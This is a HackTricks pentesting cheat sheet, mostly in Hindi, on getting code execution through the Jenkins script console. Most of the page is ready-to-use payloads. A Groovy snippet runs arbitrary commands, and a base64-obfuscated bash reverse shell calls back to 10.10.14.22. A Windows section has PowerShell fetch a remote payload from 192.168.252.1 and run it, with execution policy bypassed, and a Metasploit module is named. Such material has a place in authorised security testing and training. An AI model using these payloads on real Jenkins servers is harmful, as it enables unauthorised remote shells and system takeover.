Jenkins RCE with Groovy Script

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Jenkins RCE with Groovy Script

यह जेनकिंस में एक नया प्रोजेक्ट बनाने की तुलना में कम शोर करता है

path_jenkins/script पर जाएं
टेक्स्ट बॉक्स के अंदर स्क्रिप्ट डालें

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

आप एक कमांड का उपयोग करके निष्पादित कर सकते हैं: cmd.exe /c dir

लिनक्स में आप कर सकते हैं: "ls /".execute().text

यदि आपको टेक्स्ट के अंदर कोट्स और सिंगल कोट्स का उपयोग करने की आवश्यकता है। आप """PAYLOAD""" (ट्रिपल डबल कोट्स) का उपयोग करके पेलोड को निष्पादित कर सकते हैं।

एक और उपयोगी ग्रोवी स्क्रिप्ट है (स्थानापन्न [INSERT COMMAND]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

लिनक्स में रिवर्स शेल

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Windows में रिवर्स शेल

आप एक PS रिवर्स शेल के साथ HTTP सर्वर तैयार कर सकते हैं और इसे डाउनलोड और निष्पादित करने के लिए Jeking का उपयोग कर सकते हैं:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Script

आप इस प्रक्रिया को इस स्क्रिप्ट के साथ स्वचालित कर सकते हैं।

आप रिवर्स शेल प्राप्त करने के लिए MSF का उपयोग कर सकते हैं:

msf> use exploit/multi/http/jenkins_script_console

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या telegram समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud github रिपोजिटरी में PRs सबमिट करें।

PreviousBasic Jenkins Information NextJenkins RCE Creating/Modifying Project

Last updated 8 days ago